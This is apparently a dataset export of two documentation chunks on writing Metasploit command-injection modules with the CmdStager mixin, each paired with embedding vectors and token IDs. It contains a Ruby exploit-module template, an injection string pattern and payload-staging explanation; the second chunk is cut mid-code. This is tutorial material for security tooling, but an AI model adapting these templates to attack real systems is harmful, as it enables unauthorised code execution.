text
stringlengths
5
3.08k
embedding
sequence
tokens
sequence
database
stringclasses
5 values
file
stringlengths
5
9
chunk
int64
0
192
any payload that starts with linux / x64 and includes binary elf payloads. these payload types must be saved to disk before they can be launched, and as such, you will often see this second type of payload referred to as a β€˜ dropper ’ because the file must be β€˜ dropped ’ to the disk before it can be executed. in each of the targets above, we ’ ve selected a default payload we know will work. 4. executing a payload as we said earlier, the way a payload is executed depends on the payload type. by including msf : : exploit : : cmdstager you are given access to a method called execute _ cmdstager. execute _ cmdstager makes a list of required commands to encode, upload, save, decode, and execute your payload, then uses the execute _ command method you defined earlier to run each command on the target. unfortunately, we just mentioned not all payloads need to be saved to disk. in the case of a payload that does not need to be saved to disk, we only need to call execute _ command. this problem of payload / method juggling sounds far worse than it is. below is a quick example of how simple the exploit method will become if you have properly defined your targets as discussed in step 3 : def exploit print _ status ( " executing # { target. name } for # { datastore ['payload'] } " ) case target ['type'] when : unix _ cmd execute _ command ( payload. encoded ) when : linux _ dropper execute _ cmdstager end end that ’ s it. if the user selects an arch _ cmd payload, we call the execute _ command method on the payload because as we said earlier, these payloads will execute within a single command. if the user has selected a dropped payload like arch _ x64 or arch _ x86, then we call execute _ cmdstager which figures out the series of commands necessary to save the file to disk and launch it based on the flavor and max size you set earlier. over the years, we have also learned that these options are quite handy when calling execute _ cmdstager : flavor - you can specify what command stager ( flavor ) to use from here. delay - how much time to delay between each command execution. 0. 25 is default. linemax - maximum number of characters per command. 2047 is default. msf : : exploit : : cmdstager template
[ 0.07519363611936569, -0.06763359904289246, -0.5945612788200378, 0.8982959985733032, -0.43125176429748535, 0.0922260656952858, -0.34339553117752075, 0.12865503132343292, 0.0711372122168541, 0.7225095629692078, 0.1764068752527237, 0.6272917985916138, 0.3084954619407654, -0.4942278563976288, -0.16026921570301056, -0.04091515392065048, 0.018721867352724075, -0.09449438750743866, -0.5330294966697693, -0.33143654465675354, 0.1799284666776657, -0.2434825301170349, -0.6943694353103638, -0.7165994048118591, -0.47705167531967163, -0.14431488513946533, 0.10739018023014069, -0.4222314655780792, 0.15969225764274597, 0.4001832604408264, 0.07951021194458008, -0.21380847692489624, 0.5654835104942322, -0.8228489756584167, 0.16465815901756287, -0.2352035641670227, 1.0296976566314697, -0.12933902442455292, 0.08697618544101715, -0.4908812344074249, 0.6708407998085022, 0.13719385862350464, -0.0005609543295577168, 0.08412601053714752, -0.7682934403419495, -0.37798359990119934, 0.006036887411028147, -0.0823378637433052, 0.5012885928153992, 0.2709555923938751, 0.6032130122184753, 0.550041913986206, -0.4327317774295807, 0.42265784740448, 0.07183346152305603, -0.21372534334659576, 0.055529095232486725, -0.08215309679508209, -0.30139458179473877, 0.20879735052585602, -0.4672495424747467, 0.16503529250621796, 0.12584184110164642, -0.4906690716743469, -0.609082043170929, 0.3689746558666229, -0.2759162187576294, -0.5980626344680786, -0.6930404901504517, -0.5885449051856995, -0.17699813842773438, 0.6691765189170837, -0.1015588715672493, -0.5967876315116882, -0.4536636769771576, -0.12486537545919418, -0.23030559718608856, -0.2431180328130722, -0.5580344200134277, 0.08671408146619797, -0.04758700355887413, 0.5910041332244873, 0.019606927409768105, -0.16831299662590027, 0.4998071491718292, -0.5469052195549011, 0.622839093208313, 1.0675688982009888, -0.37306731939315796, 0.6338940858840942, 0.23041625320911407, 0.22210058569908142, -1.248421311378479, -0.25171688199043274, 0.09937325119972229, 0.7289644479751587, -0.022620828822255135, -0.04185299575328827, 0.7494859099388123, -0.4326429069042206, 1.2211817502975464, 0.49731504917144775, 0.12312766909599304, 0.2488514930009842, -0.1178552433848381, 0.649894118309021, -0.06227334216237068, -0.1485094577074051, -0.5033036470413208, -0.07912052422761917, 0.3812503516674042, -0.021963074803352356, -0.25588318705558777, -0.656748354434967, -0.39118555188179016, 0.07708590477705002, 0.5828308463096619, -0.05845049396157265, -0.3991076946258545, 1.0648372173309326, -0.14073550701141357, -0.584923267364502, -0.01341839600354433, -0.4586247205734253, -0.25532448291778564, -0.2730770409107208, 0.16484028100967407, 0.9421224594116211, -0.5722828507423401, -0.7151841521263123, -0.30286791920661926, -0.27841004729270935, 0.38664183020591736, 0.840099573135376, -0.062097661197185516, 0.26667413115501404, 0.15418128669261932, 0.1700572371482849, 1.3074071407318115, -0.856702983379364, 0.04970283806324005, 0.09414450079202652, 0.3793810307979584, 0.9006582498550415, 0.4296926259994507, -0.29025575518608093, -0.5420442819595337, 0.29845792055130005, -0.5084047317504883, 0.39565542340278625, 0.013434969820082188, 0.17516228556632996, 0.7881789803504944, -0.5074841380119324, -0.6870132088661194, -0.2685537040233612, -0.23612599074840546, 0.6618406176567078, -0.020140616223216057, -0.411234974861145, 0.04477837681770325, 0.8537063002586365, -0.23993924260139465, 0.25228139758110046, -0.47048890590667725, 0.23329652845859528, -0.5759413838386536, -0.3331899642944336, -0.3664305806159973, -0.1017581969499588, 0.38948068022727966, 0.1246127262711525, 0.11187198758125305, 0.6302855610847473, 1.5826290845870972, 1.0421663522720337, 0.16712915897369385, 0.06746572256088257, 0.32841038703918457, 0.2850710451602936, -0.6292211413383484, 0.4090084433555603, 0.49552518129348755, 1.0761632919311523, 0.5237584114074707, 0.6572200059890747, 0.07586772739887238, -0.2312900871038437, 0.37667137384414673, -0.2364630401134491, -0.4203638732433319, 0.2948361337184906, -0.4543430209159851, 0.37423422932624817, 0.6877047419548035, 0.19708287715911865, -0.9997749328613281, -0.21840645372867584, -0.5185753107070923, -1.2348226308822632, -0.3602771461009979, 0.009861350059509277, -0.27142098546028137, 0.5449525117874146, -0.6924909949302673, -0.2573802173137665, 1.174747109413147, 0.44163087010383606, 0.33942505717277527, 0.930400550365448, 0.7065537571907043, 0.05387284606695175, -0.5857194662094116, -0.3634875416755676, -0.20413953065872192, 0.2509547173976898, -0.3879295885562897, 0.18779729306697845, -0.26792922616004944, -0.13044334948062897, -0.4358682334423065, 0.5977945327758789, 0.7508248090744019, -0.11833731085062027, 0.02343372441828251, -1.032408356666565, 0.01352730393409729, 0.1602885127067566, -0.41445842385292053, 0.07411488890647888, -0.09419124573469162, 0.46092239022254944, 0.29957103729248047, 0.8762627243995667, 0.24764537811279297, -0.041060276329517365, 0.9329965114593506, 0.20630989968776703, 0.08105496317148209, -0.193358913064003, 0.1297389417886734, 1.277198314666748, 0.007468006573617458, 0.5921849608421326, 0.3972637951374054, 0.35513362288475037, 0.3093934953212738, 0.16408194601535797, 0.6263447403907776, 0.7077143788337708, -0.5194350481033325, 0.18547704815864563, 0.2767610251903534, 0.24710221588611603, -0.7322086691856384, -0.27750661969184875, 0.21874447166919708, 0.6798679828643799, -1.0233675241470337, -0.5657485723495483, 0.08235996216535568, -0.2861867845058441, -0.30513134598731995, -0.37119513750076294, -0.2104213386774063, 0.8296118974685669, -0.3720880448818207, 0.7138065099716187, -0.047431837767362595, -0.6164156794548035, -0.5393782258033752, -0.19935466349124908, -0.363286554813385, -0.8153604865074158, -0.5656337738037109, -0.04874441772699356, 0.31433814764022827, -0.4252210855484009, 0.32027700543403625, -0.540455162525177, -0.20639164745807648, 0.3498014807701111, 0.4565061330795288, 0.7119007110595703, 0.497200071811676, -0.23047548532485962, -1.108114242553711, 0.33107832074165344, -0.2634955644607544, 1.1352640390396118, -0.1787242591381073, -0.4743930995464325, -0.2385662943124771, 0.01950782723724842, -0.06335338950157166, 0.007344505749642849, 0.9759513139724731, -0.17697933316230774, 0.4728424847126007, -0.06761296093463898, 0.053578197956085205, -0.281880646944046, 0.4575725793838501, 0.7013745903968811, -0.3181537091732025, 0.30753281712532043, -0.03947782516479492, -0.33830246329307556, 0.37071746587753296, 0.6449229717254639, -0.7866119742393494, 0.5084143877029419, 0.016504783183336258, 0.4004858136177063, -0.6513593792915344, 0.28297096490859985, 0.09769216924905777, -0.15618321299552917, 0.03558409586548805, -0.32510754466056824, 0.11112616211175919, -0.47429537773132324, -0.23265613615512848, 0.014669003896415234, -0.19769145548343658, 0.5336933135986328, -0.3461485505104065, -0.681996762752533, 0.03189288452267647, -0.5050303936004639, 0.41867271065711975, -0.11872339993715286, -0.069770447909832, 0.6416472792625427, 0.4131830334663391, -0.037441398948431015, -0.5386334657669067, -0.18618398904800415, -0.09780026972293854, -0.4212168753147125, -0.16330388188362122, -0.5213658213615417, 0.6138972640037537, 0.014487308450043201, -0.22156214714050293, 0.9081156849861145, 0.8365278244018555, -0.3940989077091217, -0.08037170022726059, -0.3222762644290924, -0.13287638127803802, -0.22517108917236328, -0.19402146339416504, 0.11406877636909485, 0.47636204957962036, 1.0708932876586914, -0.5315237045288086, -0.3836931586265564, 0.23418737947940826, 0.40105023980140686, -0.47669273614883423, -0.21629850566387177, -0.04597144201397896, 0.08216699957847595, -0.6213693022727966, 0.17263764142990112, 0.19725346565246582, 0.6672077178955078, 0.47410333156585693, -0.3649280071258545, 0.07369359582662582, -0.09616585820913315, -0.2749224007129669, 0.45938602089881897, -0.44934889674186707, -0.6267299652099609, 0.47146937251091003, 0.3078491687774658, 0.45648130774497986, -0.6575953960418701, -0.29459139704704285, -0.4495365619659424, 0.3656569719314575, 0.5850231647491455, 0.6607468128204346, -0.4851714074611664, -0.5038052201271057, -0.38332492113113403, 0.21324236690998077, -0.20816339552402496, 0.4896756708621979, -0.006173387635499239, 0.08135534822940826, -0.2064761221408844, -0.7847100496292114, -0.6228300333023071, 0.3671375811100006, 1.056665062904358, 0.5199097990989685, 0.64494788646698, 0.41720443964004517, 0.2661116421222687, -0.5915439128875732, -0.12209442257881165, -0.5362637639045715, 0.6081017255783081, -0.033427633345127106, 0.4479779005050659, -0.3982045352458954, 0.11881011724472046, 0.04351701959967613, -0.48963749408721924, -0.5344507098197937, 0.009548112750053406, 0.1490728259086609, -0.19354069232940674, -0.46407413482666016, -0.10219012945890427, 0.18424667418003082, 0.3246995210647583, -0.10178925842046738, -0.49361589550971985, -0.47392845153808594, 0.34818464517593384, 0.6797199845314026, -0.6668494939804077, -0.2260493040084839, -0.1982521414756775, -0.11025718599557877, 0.32006484270095825, -0.31050845980644226, -0.26202690601348877, -0.7130277156829834, -0.3892658054828644, -0.9296984076499939, 0.2071925550699234, 0.7528786063194275, 0.11606937646865845, -0.3200362026691437, -0.601119875907898, -0.37104660272598267, 0.9460037350654602, -0.06327839195728302, -0.5781267285346985, -0.5384498834609985, 0.23641100525856018, 0.4435987174510956, 0.20456424355506897, -0.5034817457199097, -0.04343056678771973, -0.5436776876449585, -1.006899118423462, 0.6023270487785339, -0.9746426343917847, 0.4573642909526825, 0.8022242188453674, -0.6800293922424316, 0.23759825527668, 0.011443349532783031, -0.3769707679748535, -0.19804500043392181, -0.4582909345626831, 0.6014249920845032, -0.8915453553199768, -0.1812552958726883, 0.45636501908302307, 0.11213157325983047, -0.2842438519001007, 0.4510069191455841, 0.03975135460495949, 0.46048635244369507, 0.052089035511016846, -0.5415439605712891, -0.4500010013580322, 0.0690525695681572, -0.33352962136268616, 0.6595709323883057, 0.2567702829837799, 0.4309003949165344, 0.17486411333084106, -0.39829882979393005, 1.374548077583313, 0.029768750071525574, -0.001194910379126668, -0.8050559759140015, -0.47616931796073914, 0.18632537126541138, 0.24363410472869873, 0.20719222724437714, 0.07595180720090866, 0.2853982746601105, 0.051078278571367264, -0.37238311767578125, -0.42308342456817627, -1.5384185314178467, -0.15815424919128418, 0.12914814054965973, 0.03879648447036743, 0.09561556577682495, -0.01511107012629509, 0.5239472389221191, -0.4006269574165344, -0.9771550893783569, 0.37193793058395386, -0.6195037364959717, -0.20516742765903473, -0.011947589926421642, -0.3054620325565338, -0.5827168226242065, 0.03840911015868187, -0.38079771399497986, 0.29387614130973816, -0.3878834545612335, 0.19589391350746155, 0.16066662967205048, 0.6352418065071106, 0.4429304599761963, -0.47991740703582764, -1.0418907403945923, 0.43481171131134033, 0.06526302546262741, -0.346083402633667, -0.030665233731269836, 0.5578249096870422, -0.4400525689125061, 0.12345906347036362, -0.26675835251808167, -0.40763360261917114, -0.9768173098564148, -0.8604789972305298, 0.0714835450053215, 0.009301380254328251, 0.20481805503368378, -0.9460234045982361, -0.9166719913482666, -0.0647440031170845, 0.24494795501232147, 0.4499875009059906, -1.0905287265777588, -0.16555282473564148, 0.018611742183566093, -0.1475427746772766, -0.18982425332069397, 0.19057191908359528, -0.5833566784858704, -0.6185100674629211, -0.0740584060549736, 0.22182250022888184, -0.000513367704115808, -0.5831150412559509, -0.12001685798168182, 0.24123378098011017, 0.1642996221780777, -0.04150800406932831, -0.5921250581741333, -0.39901015162467957, -0.4067322015762329, 0.09996850788593292, -0.9361898899078369, 0.27369892597198486, -0.5534021854400635, 0.6088845133781433, 0.060861505568027496, 0.06817203760147095, -0.20137909054756165, -0.2773714065551758, -0.14771737158298492, 0.0012709107249975204, 0.09822174161672592, -0.6302182078361511, 0.3031005859375, 0.0593600869178772, 0.5281699299812317, 0.3957820534706116, -0.16438071429729462, -0.9028063416481018, 0.5175001621246338, -0.15886549651622772, -1.6410995721817017, 1.1737749576568604, -0.36083513498306274, -0.521399974822998, 0.22524483501911163, -0.1961723268032074, 0.41349342465400696, -0.7084448337554932, -0.1636061817407608, 0.7577472925186157, 0.055109478533267975, -0.03981012850999832, -0.5602720975875854, 0.5358890295028687, 0.5489028096199036, -0.6233859062194824, 0.617296576499939, 0.7816195487976074, 0.22293215990066528, -0.46367597579956055, 0.041411567479372025, -0.29708293080329895, -0.7358043193817139, -0.3581726551055908, 0.5994452834129333, -0.16464631259441376, 0.047903481870889664, 0.11009275913238525, -0.6582822203636169, -0.7516910433769226, 0.27908819913864136, 0.05382509529590607, -0.04919549822807312, 0.5826113820075989, 0.8849669694900513, 0.7453311681747437, -0.3667154014110565, -0.09821955114603043, -0.5347622036933899, -0.061330799013376236, 0.6106662750244141, 0.400982141494751, -0.8469365239143372, 0.9327281713485718, 0.664268970489502, -0.3127739727497101, -0.6170295476913452, -1.0162389278411865, -0.41403093934059143, -0.39273974299430847, -0.17339691519737244, -0.7138185501098633, -0.125230610370636, -0.19722595810890198, 0.03448624908924103, 0.2601160407066345, -0.09322192519903183, -0.12672415375709534, -0.6177121996879578, 0.553126871585846, 0.016181403771042824, 0.10623268783092499, 0.8072237372398376, -0.44146448373794556, -0.052601493895053864, -0.7750369906425476, -0.0208430215716362, 0.24457599222660065, -0.22838102281093597, 0.30299514532089233, -0.4298099875450134, 0.050768207758665085, -0.14382578432559967, -0.08632107824087143, 1.0200555324554443, -0.39295583963394165, 0.5439260601997375, 0.5920839905738831, -0.590457558631897, -0.6569624543190002, -0.48723557591438293, -0.11217021197080612, 0.16094854474067688, 0.832327663898468, -0.12161123752593994, -0.49144214391708374, -0.3998914957046509, 0.5455083847045898, 0.17213240265846252, -0.5659334659576416, -0.5331329107284546, -0.8183635473251343, -0.2422916144132614, -0.11770511418581009, 0.09113901108503342, -0.4611460566520691, -0.042886387556791306, -0.12005302309989929, -0.20625904202461243, -0.6580512523651123, 0.02753322198987007, 0.2598251700401306, 0.11325766891241074, -0.4976142942905426, 0.5700002908706665, -0.6735405325889587, -0.7871303558349609, -0.48464858531951904, 0.04332663491368294, -0.5007727146148682, -0.8771253824234009, -0.2361278384923935, 0.15224172174930573, -0.8245864510536194, 0.9528269171714783, -0.6160780787467957, 0.11932201683521271, -0.2658086121082306, -0.9054067134857178, -0.1236686185002327, 0.601639449596405, -0.3099730908870697, 0.10414279997348785, 0.35365766286849976, -0.15865880250930786, 0.26539263129234314, -0.3366868495941162, -0.026744378730654716, 0.295269638299942, 0.3158089518547058, 0.3339732885360718, 0.09904379397630692, -0.6455500721931458, 0.35309240221977234, 0.4454003870487213, -0.5334643721580505, 0.07771559804677963, -1.4226462841033936, 0.3692522346973419, -0.34510985016822815, -0.21292006969451904, 0.44971224665641785, 0.6359536051750183, 0.29794904589653015, 0.7122615575790405, -0.5388544201850891, 1.2214173078536987, 0.41429445147514343, 0.13970984518527985, -0.13968642055988312, -0.17943793535232544, -0.12424168735742569, 0.01291998103260994, -0.12346331030130386, 0.29670780897140503, -0.1487448662519455, 0.48400041460990906, -0.03837764263153076, -0.2409009486436844, 0.14825019240379333, -0.260498583316803, 0.21235361695289612, 0.28964924812316895, 0.024906691163778305, 0.1528470814228058, 0.33295297622680664, -0.07373836636543274, -0.4617021679878235, -0.3411223888397217, -1.1536263227462769, -0.23386043310165405, 0.31152909994125366, -0.3148288428783417, -0.1794179230928421, -0.041278641670942307, 0.19201481342315674, -0.6860578656196594, 0.30726638436317444, 0.016268214210867882, 1.3089971542358398, 0.5054321885108948, 0.03375478461384773, 1.3476753234863281, -0.5396762490272522, -0.4569045603275299, -0.5666078329086304, 0.4569457769393921, -1.0177627801895142, -0.6544392108917236, 0.21747015416622162, 1.551870346069336, 0.22445173561573029, -0.16433803737163544, -0.2520359754562378, -0.06114014983177185, 0.12741374969482422, -0.251153826713562, 0.07228449732065201, 0.4387141764163971, -0.8866183757781982, 0.3761875033378601, 0.02554887719452381, 0.23407575488090515, 0.061960846185684204, -0.11945483833551407, 0.5806916356086731, 0.08755529671907425, -0.20806024968624115, 0.71452796459198, 0.2961999773979187, 0.2502982020378113, 0.4598792791366577, 0.5848408937454224, 0.5007496476173401, -0.6849720478057861, 0.2867453396320343, -0.1731286197900772, 0.700706958770752, -0.10030357539653778, 0.4736587107181549, -0.28956353664398193, 0.15745553374290466, 0.5215889811515808, -0.7850385904312134, -0.37288323044776917, 1.0393507480621338, -0.038205694407224655, 0.025901395827531815, 0.1945623904466629, -0.2505178153514862, -0.28266143798828125, -0.29904499650001526, -0.09048070013523102, 0.5790536999702454, 0.0061891404911875725, 0.14084160327911377, -0.017135998234152794, 0.5920358896255493, 0.5149465799331665, -0.6119987368583679, 0.23215608298778534, 0.41700664162635803, 0.18374225497245789, 0.5187528729438782, -0.1535148024559021, -1.1067681312561035, 0.31493812799453735, 0.6020967960357666, 0.640873908996582, 0.041622601449489594, 0.35412076115608215, -0.07683605700731277, 0.20376059412956238, 0.13780434429645538, -0.4564625918865204, -0.7706517577171326, -0.1353902965784073, 0.4168120324611664, -0.38794416189193726, -0.67481929063797, 0.27507275342941284, 0.42887160181999207, 0.010454786941409111, 0.16169050335884094, 0.05244375765323639, -0.0007221284904517233, -0.4323689043521881, 0.20576950907707214, -0.36585623025894165, 0.42824798822402954, 0.09798890352249146, -0.30458518862724304, -0.4597795605659485, 1.0962868928909302, 0.18549948930740356, 0.7396427392959595, -0.2922880947589874, 0.7314034104347229, -0.19101525843143463, 0.27235475182533264, 0.20898087322711945, -0.4455934762954712, -0.46271052956581116, 0.4455344080924988, -0.17234136164188385, -0.4796352684497833, 0.39716246724128723, 0.029670121148228645, 0.7329835891723633, -0.201861172914505, 0.10371306538581848, -0.46725189685821533, 0.05333004519343376, -0.18034140765666962, -0.8736467957496643, 0.7279932498931885, 0.0774189680814743, -0.9478650689125061, -0.21259649097919464, 0.35912272334098816, 0.13883551955223083, 0.49540552496910095, 0.4237920045852661, -0.2767280340194702, -0.46288758516311646, 0.14495758712291718, -0.6219671368598938, 0.5575623512268066, -0.043936073780059814, 0.1515738070011139, 0.08923157304525375, -0.38392066955566406, -0.36370518803596497, -0.12878702580928802, -0.8046866059303284, -0.3852118253707886, 0.4426825940608978, 0.4984477758407593, 0.2519911527633667, 0.467029869556427, 0.24872106313705444, -0.6684672236442566, 0.3222113847732544, 0.500734806060791, -0.10941220074892044, 0.7773905396461487, 0.5175493359565735, -0.309790700674057, 0.12297271192073822, -0.24558456242084503, 0.8313456773757935, -0.3241339325904846, -0.01887141354382038, -0.43707364797592163, 0.020580334588885307, -0.9450532793998718, -0.4116009473800659, 0.1663120985031128, -0.2339159995317459, 0.1797642707824707, 0.19884321093559265, -0.689903199672699, -0.13045330345630646, -0.19270886480808258, -0.4362491965293884, -0.07701802998781204, 0.05872836336493492, 0.00996951013803482, -0.7948388457298279, 0.9080350995063782, -0.8825402855873108, 4.413271427154541, 0.17399869859218597, 0.6555622816085815, 0.1734897792339325, 0.2814561128616333, 0.39405450224876404, 1.2676331996917725, -0.631693422794342, 0.3070632517337799, -0.6952354907989502, 0.413303941488266, -0.3175322413444519, 0.36394843459129333, 0.4251788556575775, 0.6525025367736816, 0.4484575390815735, -0.6576563119888306, 0.3279995918273926, 0.699691116809845, -0.7414581775665283, -0.8691306114196777, 0.07073937356472015, -0.3651992678642273, 0.654594898223877, 0.09501612931489944, 0.23572960495948792, 0.2096741944551468, -0.5577860474586487, 0.24350306391716003, -0.4475131928920746, -0.43082839250564575, -0.26494327187538147, 0.08105041086673737, 0.14564962685108185, -0.4355585277080536, 0.329408198595047, -0.02779768407344818, -0.4486687183380127, -0.7175191044807434, -0.5258713960647583, 0.5742998123168945, -0.1993531435728073, -0.022454768419265747, -0.11207026988267899, 0.19121572375297546, 0.8378161191940308, -0.6218599081039429, 0.6361144781112671, 0.6224345564842224, -0.3582622706890106, 0.8386013507843018, -0.32680487632751465, 0.7800424098968506, -0.2450571209192276, -0.6738321781158447, 0.9767041802406311, 0.28061020374298096, 0.005462948232889175, -0.16110606491565704, -0.23814575374126434, 0.5429052114486694, -0.7507106065750122, -0.06079114228487015, -0.3134783208370209, -1.1962895393371582, 0.28099921345710754, -0.008871916681528091, -0.011798043735325336, 0.4916689991950989, -0.1675742268562317, -0.7092400193214417, -0.08225154876708984, 0.03846853971481323, -0.33916157484054565, 0.8687118887901306, 0.053810764104127884, 0.12866656482219696, 0.07136678695678711, 0.4490683972835541, -0.031646985560655594, 0.09384078532457352, -0.3024037778377533, -1.3246004581451416, 0.24627575278282166, 0.42054256796836853, 0.40536850690841675, -0.1253347247838974, -0.8774330019950867, 0.18485736846923828, 0.4621395766735077, 0.37883251905441284, 0.24216943979263306, -0.3397842347621918, 0.1081218421459198, 0.4880913496017456 ]
[ 2151, 18093, 2008, 4627, 2007, 11603, 1013, 1060, 21084, 1998, 2950, 12441, 17163, 18093, 2015, 1012, 2122, 18093, 4127, 2442, 2022, 5552, 2000, 9785, 2077, 2027, 2064, 2022, 3390, 1010, 1998, 2004, 2107, 1010, 2017, 2097, 2411, 2156, 2023, 2117, 2828, 1997, 18093, 3615, 2000, 2004, 1037, 1520, 4530, 4842, 1521, 2138, 1996, 5371, 2442, 2022, 1520, 3333, 1521, 2000, 1996, 9785, 2077, 2009, 2064, 2022, 6472, 1012, 1999, 2169, 1997, 1996, 7889, 2682, 1010, 2057, 1521, 2310, 3479, 1037, 12398, 18093, 2057, 2113, 2097, 2147, 1012, 1018, 1012, 23448, 1037, 18093, 2004, 2057, 2056, 3041, 1010, 1996, 2126, 1037, 18093, 2003, 6472, 9041, 2006, 1996, 18093, 2828, 1012, 2011, 2164, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 4642, 5104, 26702, 2099, 2017, 2024, 2445, 3229, 2000, 1037, 4118, 2170, 15389, 1035, 4642, 5104, 26702, 2099, 1012, 15389, 1035, 4642, 5104, 26702, 2099, 3084, 1037, 2862, 1997, 3223, 10954, 2000, 4372, 16044, 1010, 2039, 11066, 1010, 3828, 1010, 21933, 3207, 1010, 1998, 15389, 2115, 18093, 1010, 2059, 3594, 1996, 15389, 1035, 3094, 4118, 2017, 4225, 3041, 2000, 2448, 2169, 3094, 2006, 1996, 4539, 1012, 6854, 1010, 2057, 2074, 3855, 2025, 2035, 18093, 2015, 2342, 2000, 2022, 5552, 2000, 9785, 1012, 1999, 1996, 2553, 1997, 1037, 18093, 2008, 2515, 2025, 2342, 2000, 2022, 5552, 2000, 9785, 1010, 2057, 2069, 2342, 2000, 2655, 15389, 1035, 3094, 1012, 2023, 3291, 1997, 18093, 1013, 4118, 26536, 18483, 4165, 2521, 4788, 2084, 2009, 2003, 1012, 2917, 2003, 1037, 4248, 2742, 1997, 2129, 3722, 1996, 18077, 4118, 2097, 2468, 2065, 2017, 2031, 7919, 4225, 2115, 7889, 2004, 6936, 1999, 3357, 1017, 1024, 13366, 18077, 6140, 1035, 3570, 1006, 1000, 23448, 1001, 1063, 4539, 1012, 2171, 1065, 2005, 1001, 1063, 2951, 23809, 2063, 1031, 1005, 18093, 1005, 1033, 1065, 1000, 1007, 2553, 4539, 1031, 1005, 2828, 1005, 1033, 2043, 1024, 19998, 1035, 4642, 2094, 15389, 1035, 3094, 1006, 18093, 1012, 12359, 1007, 2043, 1024, 11603, 1035, 4530, 4842, 15389, 1035, 4642, 5104, 26702, 2099, 2203, 2203, 2008, 1521, 1055, 2009, 1012, 2065, 1996, 5310, 27034, 2019, 7905, 1035, 4642, 2094, 18093, 1010, 2057, 2655, 1996, 15389, 1035, 3094, 4118, 2006, 1996, 18093, 2138, 2004, 2057, 2056, 3041, 1010, 2122, 18093, 2015, 2097, 15389, 2306, 1037, 2309, 3094, 1012, 2065, 1996, 5310, 2038, 3479, 1037, 3333, 18093, 2066, 7905, 1035, 1060, 21084, 2030, 7905, 1035, 1060, 20842, 1010, 2059, 2057, 2655, 15389, 1035, 4642, 5104, 26702, 2099, 2029, 4481, 2041, 1996, 2186, 1997, 10954, 4072, 2000, 3828, 1996, 5371, 2000, 9785, 1998, 4888, 2009, 2241, 2006, 1996, 14894, 1998, 4098, 2946, 2017, 2275, 3041, 1012, 2058, 1996, 2086, 1010, 2057, 2031, 2036, 4342, 2008, 2122, 7047, 2024, 3243, 18801, 2043, 4214, 15389, 1035, 4642, 5104, 26702, 2099, 1024, 14894, 1011, 2017, 2064, 20648, 2054, 3094, 2754, 2099, 1006, 14894, 1007, 2000, 2224, 2013, 2182, 1012, 8536, 1011, 2129, 2172, 2051, 2000, 8536, 2090, 2169, 3094, 7781, 1012, 1014, 1012, 2423, 2003, 12398, 1012, 2240, 17848, 1011, 4555, 2193, 1997, 3494, 2566, 3094, 1012, 19627, 2581, 2003, 12398, 1012, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 4642, 5104, 26702, 2099, 23561 ]
metasploit
107.txt
4
##at the minimum, this is how your exploit should start when you ’ re using the cmdstager mixin : class metasploitmodule < msf : : exploit : : remote rank = normalranking include msf : : exploit : : cmdstager def initialize ( info = { } ) super ( update _ info ( info,'name'= >'command injection using cmdstager ','description'= > % q { this exploits a command injection using the command stager. },'license'= > msf _ license,'author'= > ['sinn3r'],'references'= > [ ['url ','url : / / metasploit. com'] ],'platform'= >'linux ','targets'= > [ ['linux ', { } ] ],'payload'= > {'badchars'= > " \ x00 " },'cmdstagerflavor'= > ['printf'],'privileged'= > false,'disclosuredate'= >'2016 - 06 - 10 ','defaulttarget'= > 0 ) ) end def execute _ command ( cmd, opts = { } ) # calls some method to inject cmd to the vulnerable code. end def exploit print _ status ('exploiting...') execute _ cmdstager end end as you can see, we have chosen the β€œ printf ” flavor as our command stager. we will explain more about this later, but basically what it does is it writes our payload to / tmp and executes it. now let ’ s modify the execute _ command method and get code execution against the test case. based on the poc, we know that our injection string should look like this : 127. 0. 0. 1 + % 26 % 26 + [ malicious commands ] we do that in execute _ command using httpclient. notice there is actually some bad character filtering involved to get the exploit working correctly, which is expected : def filter _ bad _ chars ( cmd ) cmd. gsub! ( / chmod \ + x /,'chmod 777') cmd. gsub! ( / ; /,'% 26 % 26') cmd. gsub! ( / /,'+') end def execute _ command (
[ -0.2066439986228943, -0.4744577705860138, -0.41331225633621216, 0.908836841583252, -0.2791661024093628, -0.2406962513923645, -0.6243435740470886, 0.3867345154285431, -0.17597296833992004, 1.046004295349121, 0.11774398386478424, 0.09333295375108719, 0.6170006394386292, -0.5601878762245178, -0.4181070327758789, -0.049804575741291046, -0.6232775449752808, -0.41762956976890564, -1.520469307899475, -0.1660601943731308, 0.2635740041732788, -0.664315938949585, -0.5938283205032349, -0.4830726385116577, 0.06250861287117004, 0.07509026676416397, 0.005068459548056126, -0.4526684582233429, 0.6054310202598572, 0.16327375173568726, 0.5253707766532898, -0.3953346312046051, 0.03488370403647423, -0.36562711000442505, 0.17021144926548004, 0.1629253774881363, 0.6342927813529968, -0.6541988253593445, 0.11682682484388351, -0.4005928337574005, 0.7975299954414368, -0.6194729804992676, 0.05573807284235954, -0.33261004090309143, -0.6460342407226562, -0.42037516832351685, -0.22075097262859344, -0.027532773092389107, 0.5138958692550659, 0.1447494477033615, 0.6704884171485901, 0.16846667230129242, -0.22525881230831146, 0.14267539978027344, -0.1328921616077423, -0.195837140083313, -0.02860737033188343, 0.24327930808067322, -0.45150992274284363, -0.12147736549377441, -0.20667773485183716, 0.053959231823682785, -0.5056881904602051, -0.6470099687576294, -0.22579613327980042, 0.43485942482948303, -0.14439274370670319, -0.43499597907066345, -0.5409631133079529, -0.1420668512582779, 0.1042361631989479, 0.7868242859840393, -0.4256729483604431, -0.22007465362548828, -0.38827258348464966, -0.4090646207332611, 0.09630044549703598, -0.9130250215530396, -0.4652003347873688, 0.5255076885223389, -0.38625186681747437, 0.20790080726146698, 0.4284994900226593, -0.39786097407341003, 0.16799312829971313, -0.4211246371269226, 0.47924289107322693, 0.3209322988986969, -0.1747158318758011, -0.11877556145191193, 0.7689934968948364, 0.4910467565059662, -0.3798498511314392, -0.3800867795944214, 0.06189817935228348, 0.47117912769317627, -0.36405691504478455, 0.6226401925086975, 0.35072681307792664, 0.059337303042411804, 0.8944666385650635, 0.7195976972579956, -0.03288609907031059, 0.17521095275878906, 0.0059495787136256695, 0.465766042470932, 0.23326583206653595, -0.5967190861701965, -0.6311101317405701, -0.24283383786678314, 0.569394052028656, -0.16907955706119537, 0.0606934055685997, -0.4622845947742462, -0.4599996507167816, 0.2914714217185974, 0.4962439239025116, 0.38401177525520325, -0.0909118801355362, 0.3696092665195465, -0.3066895008087158, -0.7066413760185242, -0.3182879388332367, -0.5545547604560852, 0.3478904366493225, -0.002853600773960352, -0.02150326408445835, 1.1670825481414795, -0.34689968824386597, -0.289399653673172, -0.10022853314876556, -0.43095651268959045, 0.09703799337148666, 